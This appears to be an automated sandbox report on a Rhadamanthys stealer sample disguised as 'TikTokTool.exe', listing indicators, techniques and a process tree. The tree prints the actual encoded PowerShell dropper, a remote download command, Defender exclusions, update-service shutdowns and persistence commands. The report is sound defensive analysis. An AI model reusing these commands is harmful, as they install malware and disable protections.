rhadamanthys | 49e01e64e230c43d9e8f94122cefd54aa0f804ab9735c4ed8b961a1b3f71c269

Analysis

max time kernel
39s
max time network
42s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
15-06-2024 14:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TikTokTool.exe
Size

7KB
MD5

b5e479d3926b22b59926050c29c4e761
SHA1

a456cc6993d12abe6c44f2d453d7ae5da2029e24
SHA256

fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
SHA512

09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
SSDEEP

192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio

Score

10^/10

rhadamanthys evasion execution persistence stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/lem61111111111/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar

Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

xaa22oqf.pc41.exe

description pid process target process

PID 5776 created 3064 5776 xaa22oqf.pc41.exe sihost.exe
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

2 2552 powershell.exe
4 2552 powershell.exe
24 4720 powershell.exe
25 1116 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

2552 powershell.exe
1116 powershell.exe
4720 powershell.exe
5800 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

description	pid	process	target process
PID 5776 created 3064	5776	xaa22oqf.pc41.exe	sihost.exe

flow	pid	process
2	2552	powershell.exe
4	2552	powershell.exe
24	4720	powershell.exe
25	1116	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

TikTokTool.exexaa22oqf.pc40.exexaa22oqf.pc43.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation	TikTokTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation	xaa22oqf.pc40.exe
Key value queried	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation	xaa22oqf.pc43.exe

Executes dropped EXE 4 IoCs

Processes:

xaa22oqf.pc40.exexaa22oqf.pc41.exexaa22oqf.pc42.exexaa22oqf.pc43.exe

pid process

5748 xaa22oqf.pc40.exe
5776 xaa22oqf.pc41.exe
552 xaa22oqf.pc42.exe
2524 xaa22oqf.pc43.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

3 bitbucket.org
4 bitbucket.org
25 bitbucket.org

pid	process
5748	xaa22oqf.pc40.exe
5776	xaa22oqf.pc41.exe
552	xaa22oqf.pc42.exe
2524	xaa22oqf.pc43.exe

flow	ioc
3	bitbucket.org
4	bitbucket.org
25	bitbucket.org

Drops file in System32 directory 4 IoCs

Processes:

xaa22oqf.pc42.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\MRT.exe	xaa22oqf.pc42.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Setup.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

xaa22oqf.pc42.exe

description pid process target process

PID 552 set thread context of 2832 552 xaa22oqf.pc42.exe dialer.exe
Launches sc.exe 7 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4780 sc.exe
4484 sc.exe
2968 sc.exe
4596 sc.exe
2196 sc.exe
336 sc.exe
2652 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

3764 schtasks.exe

description	pid	process	target process
PID 552 set thread context of 2832	552	xaa22oqf.pc42.exe	dialer.exe

pid	process
4780	sc.exe
4484	sc.exe
2968	sc.exe
4596	sc.exe
2196	sc.exe
336	sc.exe
2652	sc.exe

pid	process
3764	schtasks.exe

Suspicious behavior: EnumeratesProcesses 45 IoCs

Processes:

powershell.exepowershell.exepowershell.exexaa22oqf.pc41.exedialer.exexaa22oqf.pc42.exepowershell.exedialer.exe

pid	process
2552	powershell.exe
2552	powershell.exe
4720	powershell.exe
4720	powershell.exe
1116	powershell.exe
1116	powershell.exe
5776	xaa22oqf.pc41.exe
5776	xaa22oqf.pc41.exe
2380	dialer.exe
2380	dialer.exe
2380	dialer.exe
2380	dialer.exe
552	xaa22oqf.pc42.exe
5800	powershell.exe
5800	powershell.exe
552	xaa22oqf.pc42.exe
552	xaa22oqf.pc42.exe
552	xaa22oqf.pc42.exe
552	xaa22oqf.pc42.exe
552	xaa22oqf.pc42.exe
552	xaa22oqf.pc42.exe
552	xaa22oqf.pc42.exe
552	xaa22oqf.pc42.exe
552	xaa22oqf.pc42.exe
552	xaa22oqf.pc42.exe
552	xaa22oqf.pc42.exe
552	xaa22oqf.pc42.exe
2832	dialer.exe
2832	dialer.exe
552	xaa22oqf.pc42.exe
2832	dialer.exe
2832	dialer.exe
2832	dialer.exe
2832	dialer.exe
2832	dialer.exe
2832	dialer.exe
2832	dialer.exe
2832	dialer.exe
2832	dialer.exe
2832	dialer.exe
2832	dialer.exe
2832	dialer.exe
2832	dialer.exe
2832	dialer.exe
2832	dialer.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exexaa22oqf.pc42.exedialer.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	2552	powershell.exe
Token: SeDebugPrivilege	4720	powershell.exe
Token: SeDebugPrivilege	1116	powershell.exe
Token: SeDebugPrivilege	5800	powershell.exe
Token: SeDebugPrivilege	552	xaa22oqf.pc42.exe
Token: SeDebugPrivilege	2832	dialer.exe
Token: SeShutdownPrivilege	1020	powercfg.exe
Token: SeCreatePagefilePrivilege	1020	powercfg.exe
Token: SeShutdownPrivilege	3008	powercfg.exe
Token: SeCreatePagefilePrivilege	3008	powercfg.exe
Token: SeShutdownPrivilege	4652	powercfg.exe
Token: SeCreatePagefilePrivilege	4652	powercfg.exe
Token: SeShutdownPrivilege	2404	powercfg.exe
Token: SeCreatePagefilePrivilege	2404	powercfg.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

TikTokTool.exepowershell.exexaa22oqf.pc40.exexaa22oqf.pc43.execmd.execmd.execmd.execmd.exexaa22oqf.pc41.execmd.exexaa22oqf.pc42.exedialer.exe

description	pid	process	target process
PID 4052 wrote to memory of 2552	4052	TikTokTool.exe	powershell.exe
PID 4052 wrote to memory of 2552	4052	TikTokTool.exe	powershell.exe
PID 2552 wrote to memory of 5748	2552	powershell.exe	xaa22oqf.pc40.exe
PID 2552 wrote to memory of 5748	2552	powershell.exe	xaa22oqf.pc40.exe
PID 2552 wrote to memory of 5748	2552	powershell.exe	xaa22oqf.pc40.exe
PID 2552 wrote to memory of 5776	2552	powershell.exe	xaa22oqf.pc41.exe
PID 2552 wrote to memory of 5776	2552	powershell.exe	xaa22oqf.pc41.exe
PID 2552 wrote to memory of 5776	2552	powershell.exe	xaa22oqf.pc41.exe
PID 2552 wrote to memory of 552	2552	powershell.exe	xaa22oqf.pc42.exe
PID 2552 wrote to memory of 552	2552	powershell.exe	xaa22oqf.pc42.exe
PID 2552 wrote to memory of 2524	2552	powershell.exe	xaa22oqf.pc43.exe
PID 2552 wrote to memory of 2524	2552	powershell.exe	xaa22oqf.pc43.exe
PID 2552 wrote to memory of 2524	2552	powershell.exe	xaa22oqf.pc43.exe
PID 5748 wrote to memory of 2312	5748	xaa22oqf.pc40.exe	cmd.exe
PID 5748 wrote to memory of 2312	5748	xaa22oqf.pc40.exe	cmd.exe
PID 2524 wrote to memory of 1564	2524	xaa22oqf.pc43.exe	cmd.exe
PID 2524 wrote to memory of 1564	2524	xaa22oqf.pc43.exe	cmd.exe
PID 2312 wrote to memory of 5604	2312	cmd.exe	chcp.com
PID 2312 wrote to memory of 5604	2312	cmd.exe	chcp.com
PID 1564 wrote to memory of 5952	1564	cmd.exe	where.exe
PID 1564 wrote to memory of 5952	1564	cmd.exe	where.exe
PID 2312 wrote to memory of 5656	2312	cmd.exe	findstr.exe
PID 2312 wrote to memory of 5656	2312	cmd.exe	findstr.exe
PID 2312 wrote to memory of 5668	2312	cmd.exe	findstr.exe
PID 2312 wrote to memory of 5668	2312	cmd.exe	findstr.exe
PID 1564 wrote to memory of 4720	1564	cmd.exe	powershell.exe
PID 1564 wrote to memory of 4720	1564	cmd.exe	powershell.exe
PID 2312 wrote to memory of 1784	2312	cmd.exe	findstr.exe
PID 2312 wrote to memory of 1784	2312	cmd.exe	findstr.exe
PID 2312 wrote to memory of 1620	2312	cmd.exe	schtasks.exe
PID 2312 wrote to memory of 1620	2312	cmd.exe	schtasks.exe
PID 2312 wrote to memory of 3764	2312	cmd.exe	schtasks.exe
PID 2312 wrote to memory of 3764	2312	cmd.exe	schtasks.exe
PID 2312 wrote to memory of 5472	2312	cmd.exe	cmd.exe
PID 2312 wrote to memory of 5472	2312	cmd.exe	cmd.exe
PID 5472 wrote to memory of 1292	5472	cmd.exe	reg.exe
PID 5472 wrote to memory of 1292	5472	cmd.exe	reg.exe
PID 2312 wrote to memory of 5448	2312	cmd.exe	cmd.exe
PID 2312 wrote to memory of 5448	2312	cmd.exe	cmd.exe
PID 5448 wrote to memory of 5356	5448	cmd.exe	reg.exe
PID 5448 wrote to memory of 5356	5448	cmd.exe	reg.exe
PID 2312 wrote to memory of 1116	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 1116	2312	cmd.exe	powershell.exe
PID 5776 wrote to memory of 2380	5776	xaa22oqf.pc41.exe	dialer.exe
PID 5776 wrote to memory of 2380	5776	xaa22oqf.pc41.exe	dialer.exe
PID 5776 wrote to memory of 2380	5776	xaa22oqf.pc41.exe	dialer.exe
PID 5776 wrote to memory of 2380	5776	xaa22oqf.pc41.exe	dialer.exe
PID 5776 wrote to memory of 2380	5776	xaa22oqf.pc41.exe	dialer.exe
PID 832 wrote to memory of 2724	832	cmd.exe	wusa.exe
PID 832 wrote to memory of 2724	832	cmd.exe	wusa.exe
PID 552 wrote to memory of 2832	552	xaa22oqf.pc42.exe	dialer.exe
PID 552 wrote to memory of 2832	552	xaa22oqf.pc42.exe	dialer.exe
PID 552 wrote to memory of 2832	552	xaa22oqf.pc42.exe	dialer.exe
PID 552 wrote to memory of 2832	552	xaa22oqf.pc42.exe	dialer.exe
PID 552 wrote to memory of 2832	552	xaa22oqf.pc42.exe	dialer.exe
PID 552 wrote to memory of 2832	552	xaa22oqf.pc42.exe	dialer.exe
PID 552 wrote to memory of 2832	552	xaa22oqf.pc42.exe	dialer.exe
PID 2832 wrote to memory of 616	2832	dialer.exe	winlogon.exe
PID 2832 wrote to memory of 664	2832	dialer.exe	lsass.exe
PID 2832 wrote to memory of 952	2832	dialer.exe	svchost.exe
PID 2832 wrote to memory of 380	2832	dialer.exe	dwm.exe
PID 2832 wrote to memory of 744	2832	dialer.exe	svchost.exe
PID 2832 wrote to memory of 1048	2832	dialer.exe	svchost.exe
PID 2832 wrote to memory of 1076	2832	dialer.exe	svchost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:380

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1048

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1224

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:3084

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1256

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1388

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1524

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:3064

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1644

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1660

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1888

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1956

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1268

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:1952

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2492

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2508

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2572

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:1028

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3424

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3540

C:\Users\Admin\AppData\Local\Temp\TikTokTool.exe
"C:\Users\Admin\AppData\Local\Temp\TikTokTool.exe"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2552

C:\Users\Admin\AppData\Roaming\xaa22oqf.pc40.exe
"C:\Users\Admin\AppData\Roaming\xaa22oqf.pc40.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5748

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\51C9.tmp\51CA.tmp\51CB.bat C:\Users\Admin\AppData\Roaming\xaa22oqf.pc40.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:2312

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:5916

C:\Windows\system32\chcp.com
chcp 1251
6⤵
PID:5604

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
6⤵
PID:5656

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
6⤵
PID:5668

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
6⤵
PID:1784

C:\Windows\system32\schtasks.exe
schtasks /query /tn "MyBatchScript"
6⤵
PID:1620

C:\Windows\system32\schtasks.exe
schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
6⤵
- Creates scheduled task(s)
PID:3764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
6⤵
- Suspicious use of WriteProcessMemory
PID:5472

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
7⤵
PID:1292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
6⤵
- Suspicious use of WriteProcessMemory
PID:5448

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
7⤵
PID:5356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1116

C:\Users\Admin\AppData\Roaming\xaa22oqf.pc41.exe
"C:\Users\Admin\AppData\Roaming\xaa22oqf.pc41.exe"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5776

C:\Users\Admin\AppData\Roaming\xaa22oqf.pc42.exe
"C:\Users\Admin\AppData\Roaming\xaa22oqf.pc42.exe"
4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:552

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
5⤵
- Suspicious use of WriteProcessMemory
PID:832

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
6⤵
PID:2724

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
5⤵
- Launches sc.exe
PID:4780

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:4484

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
5⤵
- Launches sc.exe
PID:2968

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
5⤵
- Launches sc.exe
PID:4596

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
5⤵
- Launches sc.exe
PID:2196

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1020

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3008

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2404

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4652

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2832

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "AAWUFTXN"
5⤵
- Launches sc.exe
PID:336

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"
5⤵
- Launches sc.exe
PID:2652

C:\Users\Admin\AppData\Roaming\xaa22oqf.pc43.exe
"C:\Users\Admin\AppData\Roaming\xaa22oqf.pc43.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2524

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\52C3.tmp\52C4.tmp\52C5.bat C:\Users\Admin\AppData\Roaming\xaa22oqf.pc43.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:1564

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:6028

C:\Windows\system32\where.exe
where node
6⤵
PID:5952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3660

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3856

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4004

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4260

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4840

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3128

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
